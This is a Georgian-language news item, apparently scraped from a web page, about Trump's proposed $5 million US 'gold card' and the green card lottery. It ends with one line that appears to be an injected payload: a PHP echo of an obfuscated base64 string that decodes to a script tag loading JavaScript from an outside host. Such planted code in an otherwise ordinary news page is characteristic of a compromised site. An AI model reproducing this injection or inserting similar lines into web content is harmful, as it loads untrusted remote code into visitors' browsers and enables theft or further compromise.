tube
ავერსი jaluzi

ამერიკის 47-ე პრეზიდენტი გამოდის იდეით 5 მლნ დოლარად გაიყიდოს ე.წ ოქროს ბარათი, რომლის მფლობელებს აშშ-ში ცხოვრების და მუშაობის უფლება ექნებათ.

დონალდ ტრამპის განცხადებით, "ოქროს ბარათი" მდიდარ უცხოელებს შესაძლებლობას მისცემს იცხოვრონ და იმუშაონ ამერიკაში და ასევე იქნება ერთგვარი გზა ამერიკის მოქალაქეობის მისაღებად.

"ვაპირებთ გავყიდოთ ოქროს ბარათი", - ამბობს ტრამპი და ამატებს, რომ ბარათის გაყიდვა რამდენიმე კვირაში დაიწყება. კითხვაზე შეძლებენ თუ არა რუსი ოლიგარქები ამ ბარათის ყიდვას, ტრამპი ამბობს, რომ დიახ, შესაძლებელია მათაც შეიძინონ.

"რამდენიმე რუს ოლიგარქს ვიცნობ და ძალიან კარგი ხალხია", - ამბობს ამერიკის პრეზიდენტი.

მწვანე ბარათის გათამაშება ყოველ წელს ტარდება, სადაც გარკვეული ქვეყნის მოქალაქეებს უფლება აქვთ შეავსონ განაცხადი, რამდენიმე თვის შემდეგ შემთხვევითი შერჩევის პრინციპით ცხადდებიან გამარჯვებულები. კვალიფიცირებულ განაცხადებს სახელმწიფო დეპარტამენტი შემთხვევითობის პრინციპით, კომპიუტერის საშუალებით შეარჩევს თითოეულ რეგიონსა და ქვეყანაში გამოყოფილი ვიზების რაოდენობის მიხედვით. აშშ-ის კანონმდებლობის თანახმად, საიმიგრაციო ვიზები არ მიენიჭება იმ ქვეყნების მოქალაქეებს, საიდანაც მოქალაქეების მაღალი პროცენტი შედის აშშ-ში. კანონმდებლობის თანახმად ეს ის ქვეყნებია, საიდანაც ბოლო ხუთი წლის განმავლობაში აშშ-ში საცხოვრებლად ჩავიდა 50000 ადამიანი, რომლებმაც მიიღეს "ოჯახის“ და „სამუშაო“ კატეგორიების ვიზები.

232
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");